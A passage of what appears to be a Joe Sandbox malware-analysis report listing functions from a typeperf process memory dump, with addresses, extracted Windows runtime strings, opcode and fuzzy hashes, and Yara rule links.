                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                        • Instruction ID: 5b3d2cdae1690f7d39c7e23560bd64b669275256c4c75157712a3ea5d6ceb4cc
                                                                                                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                        • Instruction Fuzzy Hash: C6022775519385AFC354CF68C490AAFBBE9EFC8700F08892DF9854B264DB72E905CB42
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0303B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction ID: e75aa486d31d11f2bd1ee8b610a90ba6cf71d3b757a749c2b2f040df98b5e3f6
                                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction Fuzzy Hash: 4D819B74E472499BDF24CF68C8917EEBBEAEF46318F1C465AD861A7391C7348841CB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 030A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                        • Opcode ID: fd5413ecf0c2729fef74160f1b4988d72e505c937b0b02f5393d3ed331fe5c16
                                                                                                                        • Instruction ID: 420a6602a9210bdd87059e7d4000c28f1238dd363f754f8309f4ee3c5b0a70e8
                                                                                                                        • Opcode Fuzzy Hash: fd5413ecf0c2729fef74160f1b4988d72e505c937b0b02f5393d3ed331fe5c16
                                                                                                                        • Instruction Fuzzy Hash: E0216276A01619ABDB50DFBDDC50AFEB7FCEF54640F080566E905E7200E730DA418BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0301F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RTL: Re-Waiting, xrefs: 0306031E
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030602E7
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030602BD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054
                                                                                                                        • Opcode ID: a6be6f8fb42bbdace4424016368570f164b8a35ca3980753d1a8028ee4b91499
                                                                                                                        • Instruction ID: 58f45c63f27b4e7fb30a4c344175836c604f38bd5d525a8e22f4448cd8075546
                                                                                                                        • Opcode Fuzzy Hash: a6be6f8fb42bbdace4424016368570f164b8a35ca3980753d1a8028ee4b91499
                                                                                                                        • Instruction Fuzzy Hash: 73E1EE7160A7429FD725CF28C884B6AB7E4BF85324F180B6DF4A58B2E0D774D855CB42
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0302BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RTL: Re-Waiting, xrefs: 03067BAC
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03067B7F
                                                                                                                        • RTL: Resource at %p, xrefs: 03067B8E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        • Opcode ID: 7dc40e9d2e40b40f9360523808cf0d865d4a5d64f4430c81bb849889c9198019
                                                                                                                        • Instruction ID: ced1a7a60ef77e913dd0a51de3bb919a29490e0ea69004f1f8e4d3e1a0eff6d2
                                                                                                                        • Opcode Fuzzy Hash: 7dc40e9d2e40b40f9360523808cf0d865d4a5d64f4430c81bb849889c9198019
                                                                                                                        • Instruction Fuzzy Hash: 2C4117357027029FD764DE25CC40B6ABBE9EF88720F140A1DF95ADB680DB71E8058B91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0302B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0306728C
                                                                                                                        Strings
                                                                                                                        • RTL: Re-Waiting, xrefs: 030672C1
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03067294
                                                                                                                        • RTL: Resource at %p, xrefs: 030672A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        • Opcode ID: bc3676aac9fcb620bf712bd28d8897e8c7cd1b8ebf959d8102e432dd269604fa
                                                                                                                        • Instruction ID: 9c1a2ef9094e207dc9dcaec843fe4a931d287027ce93d55fd83ebafd3104f3ef
                                                                                                                        • Opcode Fuzzy Hash: bc3676aac9fcb620bf712bd28d8897e8c7cd1b8ebf959d8102e432dd269604fa
                                                                                                                        • Instruction Fuzzy Hash: 7941E335702317ABD720DE25CC81F6AB7E5FF84B14F180A19F956AB640DB21F8468BD1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 030A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        • Opcode ID: b3ab4961a655d750cdfc40d3f3c1998e5e40122954713f0e84db02e1bc3204f2
                                                                                                                        • Instruction ID: 2215313d705c729be6d371bf4eacec6bc6258931174f328640c93de5014cfd87
                                                                                                                        • Opcode Fuzzy Hash: b3ab4961a655d750cdfc40d3f3c1998e5e40122954713f0e84db02e1bc3204f2
                                                                                                                        • Instruction Fuzzy Hash: A431A777A016199FDB60DE6CDC40BEFB7FCEF45600F4545A6E849E7100EB309A448B60
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03037D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction ID: 5eec50810f3fcced4b1d46508efb1c0b12e6a592b9b757bbe97cfe61b62e9370
                                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction Fuzzy Hash: 009185B4E0221A9FDB64DE69C8817BEB7FDFF46B20F18455AE865E72C0D73099408750
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02FF9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280
                                                                                                                        • Opcode ID: 9792776dc763e27a1f04289e75e6b93d45f9f57f0ac0e5a8ef2e762c2d2bafc7
                                                                                                                        • Instruction ID: cb51a30c5146f2570b9c85093b1a43b7e14c603307f890d998147f4c3a091c37
                                                                                                                        • Opcode Fuzzy Hash: 9792776dc763e27a1f04289e75e6b93d45f9f57f0ac0e5a8ef2e762c2d2bafc7
                                                                                                                        • Instruction Fuzzy Hash: 7D815C75D012699BDB31DF54CC44BEEB7B8AF48750F0045EAAA19B7290E7705E84CFA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0307CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0307CFBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallFilterFunc@8
                                                                                                                        • String ID: @$@4Qw@4Qw
                                                                                                                        • API String ID: 4062629308-2383119779
                                                                                                                        • Opcode ID: 0dfcacd5d8a8830271ce0057aaac3fcee705a11a6bb5788382692ae29d35b669
                                                                                                                        • Instruction ID: 443e9740cfc9ee3cc422cc1a4135c9d8d4d3618cbae05b77488be3bd8fe6565e
                                                                                                                        • Opcode Fuzzy Hash: 0dfcacd5d8a8830271ce0057aaac3fcee705a11a6bb5788382692ae29d35b669
                                                                                                                        • Instruction Fuzzy Hash: A841BDB5E02218DFDB21DFA4D840AAEBBF8EF85B00F04446AE915DF254D734D941CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%